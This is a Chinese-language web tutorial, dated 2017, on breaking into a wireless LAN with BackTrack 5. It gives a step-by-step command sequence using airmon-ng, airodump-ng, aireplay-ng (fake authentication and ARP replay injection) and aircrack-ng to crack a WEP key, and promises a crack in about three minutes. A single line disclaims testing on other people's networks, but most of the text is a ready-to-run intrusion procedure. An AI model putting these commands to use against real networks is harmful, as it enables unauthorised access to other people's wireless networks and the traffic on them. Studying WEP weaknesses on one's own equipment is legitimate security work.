backtrack5怎么入侵局域网

发布时间:2017-03-24 02:49

Backtrack一直都被当作WEP密码破解的首选系统, BackTrack 5和之前的BackTrack 3和BackTrack 4一样集成了破解无线密码的工具并且支持更多型号的网卡. 3分钟破解一个用WEP加密方式的无线网络用BackTrack 5是完全可能的.下面是小编给大家整理的一些有关backtrack5入侵局域网教程,希望对大家有帮助!

backtrack5入侵局域网教程

backtrack5怎么入侵局域网

非法破解他人的无线网络等同犯罪, 请以自己的无线网络作为实验环境.

首先, 需要准备:

1.BackTrack 5 光盘版或者虚拟机镜像, 也可以是Backtrack5 U盘版

2.一个兼容Backtrack的无线网卡

3.使用WEP加密的无线网络加入点(指的就是你要破解的无线网络)

点击进入Backtrack5系统下载

需要的全部指令:

(请根据实际情况替换粗体部分)

1) ifconfig -a

(可以查看到自己机子无线网卡的MAC地址和无线网卡的设备名称), 保留这个窗口方便下几步查看需要的信息, 打开新命令窗口进入一步)

2) airmon-ng start wlan0 2

(wlan0为无线网卡, 2为需要监听的频道, 根据自己情况输入, 此步骤为打开无线网卡的监听模式)

3) airodump-ng –ivs -w name -c 2 wlan0

(获取频道2的所有无线AP的信息, wlan0是无线网卡, 2为频道, 这一步的频道需要跟上一步的一致, 命令输入后会显示周围所有频道为*的无线AP,

显示的列表:

BSSID : 无线AP的Mac 地址

PWR: AP信号的大小

RXQ: 干扰值

Beacons:发送和接受的数据包, 有数据传输的时候就会跳动

#Data: 数据, 破解需要的最关键的就是这个

CH:频道

MB:网络连接速度

ESSID: AP的名称

保留这一窗口, 打开新的命令窗口进入下一步)

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0

(发送欺骗, ap_essid为AP的名称, 例如Linksys或者TP-Link, ap_mac为AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX为自己无线网卡的MAC地址, 第一步可以看到. 这一步成功后会显示Successful, 如不成功需要在信号强的地方重试, 成功后才可以进入下一步)

5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0

(ap_mac为无线AP的mac地址, 具体看步骤3, XXXXXXXX为无线网卡的mac地址, wlan0为网卡, 这一步执行以后, 开始正确的收发数据包, #Data开始上涨)

6) aircrack-ng -n 64 -b ap_mac name-*.ivs

(开始破解, ap_mac为ap的mac地址, 64指的是使用了64位加密, 多次破解失败的话可以试128)

多数情况下当#data开始迅速跳动的时候就可以开始破解了, 不需要等到多少包, 如果#data这个数据增长缓慢的话, 换个位置到无线信号强的地方再试, 命令输入正确的话最快3分钟搞定一个64位加密的WEP AP是没问题的! e网软摘测试时用的USB网卡, 如果使用内置无线网卡性能上会提升很多.

backtrack5怎么入侵局域网的评论条评论